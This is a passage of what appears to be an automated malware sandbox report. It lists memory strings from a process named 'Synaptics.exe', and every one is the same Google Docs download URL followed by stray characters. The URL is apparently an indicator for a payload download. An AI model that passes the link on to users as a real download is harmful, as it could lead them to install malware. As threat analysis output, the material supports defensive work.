                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadity
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiver
                                Source: Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiw
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadix
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D76F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor...
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk4
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkv
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl9As?
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlJ
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlO
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl_
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyFY
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyor...
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme2H
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme7J
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlo$
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadload
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlunaxU
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadly
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm/
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm:
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmF
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmK
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmad
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmpanyZ
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn#
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn5
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn?
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnA
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnamad
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadname
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncel
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadndFsS
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne.cn
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetl
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng...
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyocJ
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadntdes?E.sw
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoU
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadocl
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadod
                                Source: Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                                Source: Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo.com.
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadooo.
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoq
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp2#
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp;
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpData0E
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpE.xs
                                Source: Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpH
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpN.
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx6
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp~
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...mU)pn
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr7
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrK
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrP
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrV
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrcBf
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadred.m
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrnia1
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrojec
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrontd
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrse
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsH
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsand.
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsearc
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsers
                                Source: Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsh
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsk
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsp
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadst
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsu
